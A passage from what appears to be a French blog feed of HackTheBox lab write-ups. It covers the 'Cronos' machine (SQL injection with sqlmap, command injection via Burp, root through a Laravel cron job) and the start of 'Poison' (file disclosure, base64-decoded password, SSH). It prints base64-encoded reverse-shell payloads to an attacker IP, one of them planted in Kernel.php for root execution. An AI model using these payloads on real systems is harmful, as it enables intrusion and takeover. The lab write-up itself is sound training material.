class="lnt">16 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl"><span class="c1">## dig axfr @10.10.10.13 cronos.htb</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="p">;</span> &lt;&lt;&gt;&gt; DiG 9.18.33-1~deb12u2-Debian &lt;&lt;&gt;&gt; axfr @10.10.10.13 cronos.htb </span></span><span class="line"><span class="cl"><span class="p">;</span> <span class="o">(</span><span class="m">1</span> server found<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="p">;;</span> global options: +cmd </span></span><span class="line"><span class="cl">cronos.htb. 604800 IN SOA cronos.htb. admin.cronos.htb. <span class="m">3</span> <span class="m">604800</span> <span class="m">86400</span> <span class="m">2419200</span> <span class="m">604800</span> </span></span><span class="line"><span class="cl">cronos.htb. 604800 IN NS ns1.cronos.htb. </span></span><span class="line"><span class="cl">cronos.htb. 604800 IN A 10.10.10.13 </span></span><span class="line"><span class="cl">admin.cronos.htb. 604800 IN A 10.10.10.13 </span></span><span class="line"><span class="cl">ns1.cronos.htb. 604800 IN A 10.10.10.13 </span></span><span class="line"><span class="cl">www.cronos.htb. 604800 IN A 10.10.10.13 </span></span><span class="line"><span class="cl">cronos.htb. 604800 IN SOA cronos.htb. admin.cronos.htb. <span class="m">3</span> <span class="m">604800</span> <span class="m">86400</span> <span class="m">2419200</span> <span class="m">604800</span> </span></span><span class="line"><span class="cl"><span class="p">;;</span> Query time: <span class="m">20</span> msec </span></span><span class="line"><span class="cl"><span class="p">;;</span> SERVER: 10.10.10.13#53<span class="o">(</span>10.10.10.13<span class="o">)</span> <span class="o">(</span>TCP<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="p">;;</span> WHEN: Thu Jul <span class="m">10</span> 22:16:46 CEST <span class="m">2025</span> </span></span><span class="line"><span class="cl"><span class="p">;;</span> XFR size: <span class="m">7</span> records <span class="o">(</span>messages 1, bytes 203<span class="o">)</span> </span></span></code></pre></td></tr></table> </div> </div><h3 id="admincronoshtb-login-page">admin.cronos.htb login page </h3><h3 id="sqlmap">sqlmap </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">sqlmap --forms --batch -u <span class="s2">&#34;http://admin.cronos.htb/&#34;</span> </span></span><span class="line"><span class="cl">&gt; username field is vulnerable to blind SQL Injection ! </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">sqlmap --forms --batch -u <span class="s2">&#34;http://admin.cronos.htb/&#34;</span> --current-db </span></span><span class="line"><span class="cl">&gt; admin </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">sqlmap --forms --batch -u <span class="s2">&#34;http://admin.cronos.htb/&#34;</span> -D admin --tables </span></span><span class="line"><span class="cl">&gt; users </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">sqlmap --forms --batch -u <span class="s2">&#34;http://admin.cronos.htb/&#34;</span> -D admin -T users --columns </span></span><span class="line"><span class="cl">&gt; Too slow... Trying to guess <span class="s2">&#34;password&#34;</span> field and it works ! </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">sqlmap --forms --batch -u <span class="s2">&#34;http://admin.cronos.htb/&#34;</span> -D admin -T users -C password --dump </span></span><span class="line"><span class="cl">&gt; 4f5fffa7b2340178a716e3832451e058 </span></span></code></pre></td></tr></table> </div> </div><p>Sur crackstation : Not found. Hashcat avec rockyou.txt : Not found.</p> <p>J&rsquo;ai cherché le hachage sur google : &ldquo;4f5fffa7b2340178a716e3832451e058&rdquo; Bingo ! On trouve le mot de passe : 1327663704</p> <p>On essaye les credentials sur la page de login de admin.cronos.htb et ça marche :</p> <ul> <li>user: admin</li> <li>pass: 1327663704</li> </ul> <p>Après review du code source (plus tard) on découvre que : $myusername = $_POST[&lsquo;username&rsquo;]; $mypassword = md5($_POST[&lsquo;password&rsquo;]);</p> <h3 id="command-injection---admin-dashboard">Command Injection - admin dashboard </h3><p>On peut faire des ping et des traceroute sur la page d&rsquo;admin. En utilisant burp on peut modifier la commande pour executer ce qu&rsquo;on veut. On peut alors executer un reverse shell vers notre machine :</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span><span class="lnt">32 </span><span class="lnt">33 </span><span class="lnt">34 </span><span class="lnt">35 </span><span class="lnt">36 </span><span class="lnt">37 </span><span class="lnt">38 </span><span class="lnt">39 </span><span class="lnt">40 </span><span class="lnt">41 </span><span class="lnt">42 </span><span class="lnt">43 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">POST /welcome.php HTTP/1.1 </span></span><span class="line"><span class="cl">Host: admin.cronos.htb </span></span><span class="line"><span class="cl">User-Agent: Mozilla/5.0 <span class="o">(</span>X11<span class="p">;</span> Linux x86_64<span class="p">;</span> rv:128.0<span class="o">)</span> Gecko/20100101 Firefox/128.0 </span></span><span class="line"><span class="cl">Accept: text/html,application/xhtml+xml,application/xml<span class="p">;</span><span class="nv">q</span><span class="o">=</span>0.9,*/*<span class="p">;</span><span class="nv">q</span><span class="o">=</span>0.8 </span></span><span class="line"><span class="cl">Accept-Language: en-US,en<span class="p">;</span><span class="nv">q</span><span class="o">=</span>0.5 </span></span><span class="line"><span class="cl">Accept-Encoding: gzip, deflate, br </span></span><span class="line"><span class="cl">Content-Type: application/x-www-form-urlencoded </span></span><span class="line"><span class="cl">Content-Length: <span class="m">16</span> </span></span><span class="line"><span class="cl">Origin: http://admin.cronos.htb </span></span><span class="line"><span class="cl">Connection: keep-alive </span></span><span class="line"><span class="cl">Referer: http://admin.cronos.htb/welcome.php </span></span><span class="line"><span class="cl">Cookie: <span class="nv">PHPSESSID</span><span class="o">=</span>0p5lct2jjmbq5neupststnl996 </span></span><span class="line"><span class="cl">Upgrade-Insecure-Requests: <span class="m">1</span> </span></span><span class="line"><span class="cl">Priority: <span class="nv">u</span><span class="o">=</span>0, i </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="nv">command</span><span class="o">=</span>echo+c2ggLWkgPiYgL2Rldi90Y3AvMTAuMTAuMTQuMjUvOTAwMSAwPiYx+<span class="p">|</span>+base64+-d+<span class="p">|</span>+bash<span class="p">&amp;</span><span class="nv">host</span><span class="o">=</span>z </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">------------------------ </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">$ nc -lnvp <span class="m">9001</span> </span></span><span class="line"><span class="cl">Ncat: Version 7.93 <span class="o">(</span> https://nmap.org/ncat <span class="o">)</span> </span></span><span class="line"><span class="cl">Ncat: Listening on :::9001 </span></span><span class="line"><span class="cl">Ncat: Listening on 0.0.0.0:9001 </span></span><span class="line"><span class="cl">Ncat: Connection from 10.10.10.13. </span></span><span class="line"><span class="cl">Ncat: Connection from 10.10.10.13:55658. </span></span><span class="line"><span class="cl">sh: 0: can<span class="s1">&#39;t access tty; job control turned off </span></span></span><span class="line"><span class="cl"><span class="s1">$ whoami </span></span></span><span class="line"><span class="cl"><span class="s1">www-data </span></span></span><span class="line"><span class="cl"><span class="s1">$ export TERM=xterm </span></span></span><span class="line"><span class="cl"><span class="s1">$ python3 -V </span></span></span><span class="line"><span class="cl"><span class="s1">Python 3.5.2 </span></span></span><span class="line"><span class="cl"><span class="s1">$ python3 -c &#39;</span>import pty<span class="p">;</span>pty.spawn<span class="o">(</span><span class="s2">&#34;/bin/bash&#34;</span><span class="o">)</span><span class="err">&#39;</span> </span></span><span class="line"><span class="cl">www-data@cronos:/var/www/admin$ ^Z </span></span><span class="line"><span class="cl"><span class="o">[</span>2<span class="o">]</span> + <span class="m">27640</span> suspended nc -lnvp <span class="m">9001</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>Jul 10, <span class="m">2025</span> - 23:33:12 <span class="o">(</span>CEST<span class="o">)]</span> exegol-pentest Cronos <span class="c1"># stty raw -echo;fg</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>2<span class="o">]</span> - <span class="m">27640</span> continued nc -lnvp <span class="m">9001</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">www-data@cronos:/var/www/admin$ whoami </span></span><span class="line"><span class="cl">www-data </span></span><span class="line"><span class="cl">www-data@cronos:/var/www/admin$ <span class="nb">cd</span> /home </span></span><span class="line"><span class="cl">www-data@cronos:/home$ <span class="nb">cd</span> noulis/ </span></span><span class="line"><span class="cl">www-data@cronos:/home/noulis$ cat user.txt </span></span><span class="line"><span class="cl">fe30.....e498 </span></span></code></pre></td></tr></table> </div> </div><h2 id="www-data---root">www-data -&gt; root </h2><h3 id="laravel-root-crontab">laravel root crontab </h3><p>En utilisant linpeas, on s&rsquo;en compte que l&rsquo;utilisateur <strong>root</strong> execute chaque minute :</p> <blockquote> <p>php /var/www/laravel/artisan schedule:run &raquo; /dev/null 2&gt;&amp;1</p> </blockquote> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">╔══════════╣ Check <span class="k">for</span> vulnerable cron <span class="nb">jobs</span> </span></span><span class="line"><span class="cl">╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#scheduledcron-jobs </span></span><span class="line"><span class="cl">══╣ Cron <span class="nb">jobs</span> list </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">... </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="nv">SHELL</span><span class="o">=</span>/bin/sh </span></span><span class="line"><span class="cl"><span class="nv">PATH</span><span class="o">=</span>/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="m">17</span> * * * * root <span class="nb">cd</span> / <span class="o">&amp;&amp;</span> run-parts --report /etc/cron.hourly </span></span><span class="line"><span class="cl"><span class="m">25</span> 6 * * * root <span class="nb">test</span> -x /usr/sbin/anacron <span class="o">||</span> <span class="o">(</span> <span class="nb">cd</span> / <span class="o">&amp;&amp;</span> run-parts --report /etc/cron.daily <span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="m">47</span> 6 * * 7 root <span class="nb">test</span> -x /usr/sbin/anacron <span class="o">||</span> <span class="o">(</span> <span class="nb">cd</span> / <span class="o">&amp;&amp;</span> run-parts --report /etc/cron.weekly <span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="m">52</span> 6 <span class="m">1</span> * * root <span class="nb">test</span> -x /usr/sbin/anacron <span class="o">||</span> <span class="o">(</span> <span class="nb">cd</span> / <span class="o">&amp;&amp;</span> run-parts --report /etc/cron.monthly <span class="o">)</span> </span></span><span class="line"><span class="cl">* * * * * root php /var/www/laravel/artisan schedule:run &gt;&gt; /dev/null 2&gt;<span class="p">&amp;</span><span class="m">1</span> </span></span></code></pre></td></tr></table> </div> </div><p>Grâce à ChatGPT, on comprend qu&rsquo;il faut modifier le fichier <strong>/var/www/laravel/app/Console/Kernel.php</strong>. La fonction schedule de ce fichier est executé toutes les minutes par root. Il suffit donc d&rsquo;executer une commande de reverse shell et le tour est joué.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span><span class="lnt">32 </span><span class="lnt">33 </span><span class="lnt">34 </span><span class="lnt">35 </span><span class="lnt">36 </span><span class="lnt">37 </span><span class="lnt">38 </span><span class="lnt">39 </span><span class="lnt">40 </span><span class="lnt">41 </span><span class="lnt">42 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">www-data@cronos:/var/www/laravel/app/Console$ head Kernel.php -n100 </span></span><span class="line"><span class="cl">&lt;?php </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">namespace App<span class="se">\C</span>onsole<span class="p">;</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">use Illuminate<span class="se">\C</span>onsole<span class="se">\S</span>cheduling<span class="se">\S</span>chedule<span class="p">;</span> </span></span><span class="line"><span class="cl">use Illuminate<span class="se">\F</span>oundation<span class="se">\C</span>onsole<span class="se">\K</span>ernel as ConsoleKernel<span class="p">;</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">class Kernel extends ConsoleKernel </span></span><span class="line"><span class="cl"><span class="o">{</span> </span></span><span class="line"><span class="cl"> /** </span></span><span class="line"><span class="cl"> * The Artisan commands provided by your application. </span></span><span class="line"><span class="cl"> * </span></span><span class="line"><span class="cl"> * @var array </span></span><span class="line"><span class="cl"> */ </span></span><span class="line"><span class="cl"> protected <span class="nv">$commands</span> <span class="o">=</span> <span class="o">[</span> </span></span><span class="line"><span class="cl"> // </span></span><span class="line"><span class="cl"> <span class="o">]</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> /** </span></span><span class="line"><span class="cl"> * Define the application<span class="s1">&#39;s command schedule. </span></span></span><span class="line"><span class="cl"><span class="s1"> * </span></span></span><span class="line"><span class="cl"><span class="s1"> * @param \Illuminate\Console\Scheduling\Schedule $schedule </span></span></span><span class="line"><span class="cl"><span class="s1"> * @return void </span></span></span><span class="line"><span class="cl"><span class="s1"> */ </span></span></span><span class="line"><span class="cl"><span class="s1"> protected function schedule(Schedule $schedule) </span></span></span><span class="line"><span class="cl"><span class="s1"> { </span></span></span><span class="line"><span class="cl"><span class="s1"> $schedule-&gt;exec(&#39;</span><span class="nb">echo</span> c2ggLWkgPiYgL2Rldi90Y3AvMTAuMTAuMTQuMjUvOTAwMiAwPiYx <span class="p">|</span> base64 -d <span class="p">|</span> bash<span class="s1">&#39;)-&gt;everyMinute(); </span></span></span><span class="line"><span class="cl"><span class="s1"> // $schedule-&gt;command(&#39;</span>inspire<span class="s1">&#39;) </span></span></span><span class="line"><span class="cl"><span class="s1"> // -&gt;hourly(); </span></span></span><span class="line"><span class="cl"><span class="s1"> } </span></span></span><span class="line"><span class="cl"><span class="s1"> </span></span></span><span class="line"><span class="cl"><span class="s1"> /** </span></span></span><span class="line"><span class="cl"><span class="s1"> * Register the Closure based commands for the application. </span></span></span><span class="line"><span class="cl"><span class="s1"> * </span></span></span><span class="line"><span class="cl"><span class="s1"> * @return void </span></span></span><span class="line"><span class="cl"><span class="s1"> */ </span></span></span><span class="line"><span class="cl"><span class="s1"> protected function commands() </span></span></span><span class="line"><span class="cl"><span class="s1"> { </span></span></span><span class="line"><span class="cl"><span class="s1"> require base_path(&#39;</span>routes/console.php<span class="err">&#39;</span><span class="o">)</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> <span class="o">}</span> </span></span><span class="line"><span class="cl"><span class="o">}</span> </span></span></code></pre></td></tr></table> </div> </div><p>Au bout d&rsquo;une minute, on reçoit bien un shell en tant que root.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl"><span class="c1">## nc -lnvp 9002 </span> </span></span><span class="line"><span class="cl">Ncat: Version 7.93 <span class="o">(</span> https://nmap.org/ncat <span class="o">)</span> </span></span><span class="line"><span class="cl">Ncat: Listening on :::9002 </span></span><span class="line"><span class="cl">Ncat: Listening on 0.0.0.0:9002 </span></span><span class="line"><span class="cl">Ncat: Connection from 10.10.10.13. </span></span><span class="line"><span class="cl">Ncat: Connection from 10.10.10.13:38926. </span></span><span class="line"><span class="cl">sh: 0: can<span class="err">&#39;</span>t access tty<span class="p">;</span> job control turned off </span></span><span class="line"><span class="cl"><span class="c1"># whoami</span> </span></span><span class="line"><span class="cl">root </span></span><span class="line"><span class="cl"><span class="c1"># cat /root/root.txt </span> </span></span><span class="line"><span class="cl">3c1c.....64e8 </span></span></code></pre></td></tr></table> </div> </div><h2 id="tips">Tips </h2><ul> <li>Toujours faire un <strong>sqlmap</strong> sur une page de login si on ne trouve rien ! Tester un &ldquo;&rsquo; or 1=1; &ndash;&rdquo; n&rsquo;est pas suffisant. Il y a bcp de sql injection que l&rsquo;on peut decouvrir avec SQLMAP&hellip;</li> </ul>HTB | Poisonhttps://leopoldabgn.github.io/writeups/p/poison-htb/Tue, 04 Mar 2025 00:00:00 +0000https://leopoldabgn.github.io/writeups/p/poison-htb/<table style="border:none; width:100%;"> <tr> <!-- Colonne gauche : logo --> <td style="border:none; text-align:center; vertical-align:middle; width:150px;"> <img src="cover.png" alt="Poison cover" width="120"> </td> <td style="border:none; text-align:center; vertical-align:middle;"> <table style="margin:auto; border-collapse:collapse; border:1px solid #ddd;"> <thead> <tr> <th style="padding:8px; border:1px solid #ddd; text-align:center;">Machine name</th> <th style="padding:8px; border:1px solid #ddd; text-align:center;">OS</th> <th style="padding:8px; border:1px solid #ddd; text-align:center;">IP</th> <th style="padding:8px; border:1px solid #ddd; text-align:center;">Difficulty</th> </tr> </thead> <tbody> <tr> <td style="padding:8px; border:1px solid #ddd; text-align:center;">Poison</td> <td style="padding:8px; border:1px solid #ddd; text-align:center;">Linux</td> <td style="padding:8px; border:1px solid #ddd; text-align:center;">10.10.10.84</td> <td style="padding:8px; border:1px solid #ddd; text-align:center;">Medium</td> </tr> </tbody> </table> </td> </tr> </table> <h2 id="users">Users </h2><p>charix : <code>Charix!2#4%6&amp;8(0</code></p> <h2 id="enumeration">Enumeration </h2><h3 id="nmap">nmap </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl"><span class="m">22</span> - ssh </span></span><span class="line"><span class="cl"><span class="m">80</span> - http freebsd apache </span></span></code></pre></td></tr></table> </div> </div><h2 id="foothold">Foothold </h2><h3 id="charix---user-flag">charix - user flag </h3><p>Sur la page d&rsquo;accueil on trouve un barre de recherche avec un vuln qui nous permet d&rsquo;afficher n&rsquo;importe quel fichier. On affiche /etc/passwd et on trouve le user <code>charix</code>. Ensuite, on trouve ce fichier sur la page web du port 80 de la machine. Il indique que c&rsquo;est du base64 encodé 13 fois :</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">This password is secure, it<span class="err">&#39;</span>s encoded atleast <span class="m">13</span> times.. what could go wrong really.. Vm0wd2QyUXlVWGxWV0d4WFlURndVRlpzWkZOalJsWjBUVlpPV0ZKc2JETlhhMk0xVmpKS1IySkVU bGhoTVVwVVZtcEdZV015U2tWVQpiR2hvVFZWd1ZWWnRjRWRUTWxKSVZtdGtXQXBpUm5CUFdWZDBS bVZHV25SalJYUlVUVlUxU1ZadGRGZFZaM0JwVmxad1dWWnRNVFJqCk1EQjRXa1prWVZKR1NsVlVW M040VGtaa2NtRkdaR2hWV0VKVVdXeGFTMVZHWkZoTlZGSlRDazFFUWpSV01qVlRZVEZLYzJOSVRs WmkKV0doNlZHeGFZVk5IVWtsVWJXaFdWMFZLVlZkWGVHRlRNbEY0VjI1U2ExSXdXbUZEYkZwelYy eG9XR0V4Y0hKWFZscExVakZPZEZKcwpaR2dLWVRCWk1GWkhkR0ZaVms1R1RsWmtZVkl5YUZkV01G WkxWbFprV0dWSFJsUk5WbkJZVmpKMGExWnRSWHBWYmtKRVlYcEdlVmxyClVsTldNREZ4Vm10NFYw MXVUak5hVm1SSFVqRldjd3BqUjJ0TFZXMDFRMkl4WkhOYVJGSlhUV3hLUjFSc1dtdFpWa2w1WVVa T1YwMUcKV2t4V2JGcHJWMGRXU0dSSGJFNWlSWEEyVmpKMFlXRXhXblJTV0hCV1ltczFSVmxzVm5k WFJsbDVDbVJIT1ZkTlJFWjRWbTEwTkZkRwpXbk5qUlhoV1lXdGFVRmw2UmxkamQzQlhZa2RPVEZk WGRHOVJiVlp6VjI1U2FsSlhVbGRVVmxwelRrWlplVTVWT1ZwV2EydzFXVlZhCmExWXdNVWNLVjJ0 NFYySkdjR2hhUlZWNFZsWkdkR1JGTldoTmJtTjNWbXBLTUdJeFVYaGlSbVJWWVRKb1YxbHJWVEZT Vm14elZteHcKVG1KR2NEQkRiVlpJVDFaa2FWWllRa3BYVmxadlpERlpkd3BOV0VaVFlrZG9hRlZz WkZOWFJsWnhVbXM1YW1RelFtaFZiVEZQVkVaawpXR1ZHV210TmJFWTBWakowVjFVeVNraFZiRnBW VmpOU00xcFhlRmRYUjFaSFdrWldhVkpZUW1GV2EyUXdDazVHU2tkalJGbExWRlZTCmMxSkdjRFpO <span class="nv">Ukd4RVdub3dPVU5uUFQwSwo</span><span class="o">=</span> </span></span></code></pre></td></tr></table> </div> </div><p>On trouve ce script bash sur un forum qui permet de rapidement effectué 13 fois un base64 -d :</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl"><span class="nv">state</span><span class="o">=</span><span class="k">$(</span>&lt;b64.txt<span class="k">)</span> </span></span><span class="line"><span class="cl"><span class="k">for</span> i in <span class="o">{</span>1..13<span class="o">}</span><span class="p">;</span> <span class="k">do</span> </span></span><span class="line"><span class="cl"> <span class="nv">state</span><span class="o">=</span><span class="k">$(</span><span class="o">&lt;&lt;&lt;</span><span class="s2">&#34;</span><span class="nv">$state</span><span class="s2">&#34;</span> base64 --decode<span class="k">)</span> </span></span><span class="line"><span class="cl"><span class="k">done</span> </span></span><span class="line"><span class="cl"><span class="nb">echo</span> <span class="s2">&#34;</span><span class="nv">$state</span><span class="s2">&#34;</span> </span></span></code></pre></td></tr></table> </div> </div><p>On trouve rapidement le mot de passe, puis on se connecte en SSH :</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span><span class="lnt">32 </span><span class="lnt">33 </span><span class="lnt">34 </span><span class="lnt">35 </span><span class="lnt">36 </span><span class="lnt">37 </span><span class="lnt">38 </span><span class="lnt">39 </span><span class="lnt">40 </span><span class="lnt">41 </span><span class="lnt">42 </span><span class="lnt">43 </span><span class="lnt">44 </span><span class="lnt">45 </span><span class="lnt">46 </span><span class="lnt">47 </span><span class="lnt">48 </span><span class="lnt">49 </span><span class="lnt">50 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">┌──<span class="o">(</span>kali㉿kali<span class="o">)</span>-<span class="o">[</span>~/htb<span class="o">]</span> </span></span><span class="line"><span class="cl">└─$ <span class="nb">cd</span> Poison </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">┌──<span class="o">(</span>kali㉿kali<span class="o">)</span>-<span class="o">[</span>~/htb/Poison<span class="o">]</span> </span></span><span class="line"><span class="cl">└─$ vim b64.txt </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">┌──<span class="o">(</span>kali㉿kali<span class="o">)</span>-<span class="o">[</span>~/htb/Poison<span class="o">]</span> </span></span><span class="line"><span class="cl">└─$ <span class="nv">state</span><span class="o">=</span><span class="k">$(</span>&lt;b64.txt<span class="k">)</span> </span></span><span class="line"><span class="cl"><span class="k">for</span> i in <span class="o">{</span>1..13<span class="o">}</span><span class="p">;</span> <span class="k">do</span> </span></span><span class="line"><span class="cl"> <span class="nv">state</span><span class="o">=</span><span class="k">$(</span><span class="o">&lt;&lt;&lt;</span><span class="s2">&#34;</span><span class="nv">$state</span><span class="s2">&#34;</span> base64 --decode<span class="k">)</span> </span></span><span class="line"><span class="cl"><span class="k">done</span> </span></span><span class="line"><span class="cl"><span class="nb">echo</span> <span class="s2">&#34;</span><span class="nv">$state</span><span class="s2">&#34;</span> </span></span><span class="line"><span class="cl">Charix!2#4%6<span class="p">&amp;</span>8<span class="o">(</span><span class="m">0</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">┌──<span class="o">(</span>kali㉿kali<span class="o">)</span>-<span class="o">[</span>~/htb/Poison<span class="o">]</span> </span></span><span class="line"><span class="cl">└─$ ssh charix@10.10.10.84 </span></span><span class="line"><span class="cl"><span class="o">(</span>charix@10.10.10.84<span class="o">)</span> Password <span class="k">for</span> charix@Poison: </span></span><span class="line"><span class="cl">Last login: Mon Mar <span class="m">19</span> 16:38:00 <span class="m">2018</span> from 10.10.14.4 </span></span><span class="line"><span class="cl">FreeBSD 11.1-RELEASE <span class="o">(</span>GENERIC<span class="o">)</span> <span class="c1">#0 r321309: Fri Jul 21 02:08:28 UTC 2017</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Welcome to FreeBSD! </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Release Notes, Errata: https://www.FreeBSD.org/releases/ </span></span><span class="line"><span class="cl">Security Advisories: https://www.FreeBSD.org/security/ </span></span><span class="line"><span class="cl">FreeBSD Handbook: https://www.FreeBSD.org/handbook/ </span></span><span class="line"><span class="cl">FreeBSD FAQ: https://www.FreeBSD.org/faq/ </span></span><span class="line"><span class="cl">Questions List: https://lists.FreeBSD.org/mailman/listinfo/freebsd-questions/ </span></span><span class="line"><span class="cl">FreeBSD Forums: https://forums.FreeBSD.org/ </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Documents installed with the system are in the /usr/local/share/doc/freebsd/ </span></span><span class="line"><span class="cl">directory, or can be installed later with: pkg install en-freebsd-doc </span></span><span class="line"><span class="cl">For other languages, replace <span class="s2">&#34;en&#34;</span> with a language code like de or fr. </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Show the version of 